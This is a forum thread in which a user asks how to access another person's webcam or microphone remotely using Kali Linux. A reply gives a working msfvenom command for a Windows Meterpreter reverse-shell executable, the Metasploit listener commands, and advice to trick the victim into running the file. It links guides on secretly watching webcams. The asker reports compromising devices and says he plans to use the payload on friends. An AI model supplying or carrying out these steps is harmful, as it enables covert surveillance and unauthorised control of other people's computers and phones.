Forum Thread: Kali Linux/Metasploit Help

Hello Im IT student and new to kali linux. Is it possible to access someones webcam or microphone using kali linux, considering victim is on PC let's say windows 7 or 8, and on different network than my machine is, but I know their public IP?

P.S. I also look someone who knows a thing or two, to help me out for some more stuff, btw im python programmer... so if anyone wants to help me out, leave a mail and I will pm you

Thanks in advance :)

5 Responses

If they are on a different network I think you would need to port forward, you could use msfvenom to make the payload and somehow get them to run it on their computer with this command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=yourip LPORT=openport -f exe > filename.exe

and then open up a listener by starting Metasploit and typing:
use exploit/multi/handler
set lhost yourip
set lport openpory
set payload windows/meterpreter/reverse_tcp
exploit

and then when they run it your console should say something like sending stage, now type:
sessions -i 1

this will allow you to interact with the session, from there you can follow this guide:

Link: https://null-byte.wonderhowto.com/how-to/hack-like-pro-ultimate-command-cheat-sheet-for-metasploits-meterpreter-0149146/

Link: https://null-byte.wonderhowto.com/how-to/hack-like-pro-secretly-hack-into-switch-on-watch-anyones-webcam-remotely-0142514/

I did exactly what u said, and started exploit, then it says:

At this point, on other PC, runing WIndows 7 Ultimate SP1, i double-clicked(runed) filename.exe and waited for about 1 min, but nothing happened.

I probably need to use my public IP? And if so, whats my public port?

Your public port would be any open unused port on your router and yes you need to use your public IP address if it is on a different network.

EDIT: yourip is really a public IP address, also may I ask why you want to access the webcam?

I managed to hack PC and Android phone on other networks(of course both mine). But seems like the file which I create with "msfvenom" will not install properly on every Android platform. I managed to get my Samsung A5 hacked in no time, but can't install .apk file on Vivax tablet. When I try to install it it says: Parse error. There is a problem parsing the package. I tried checking "unknown sources option".

P.S. I'm doing it to learn something from it, as I mentioned i'm IT student. I will probably use it on some of my friends ;)

EDIT: At this point, I only managed to install .apk file which I created with msfvenom on my Samsung Galaxy A5, every other Android phone which I have tried can't install it. Is there any better solution to this?

Share Your Thoughts

  • Hot
  • Active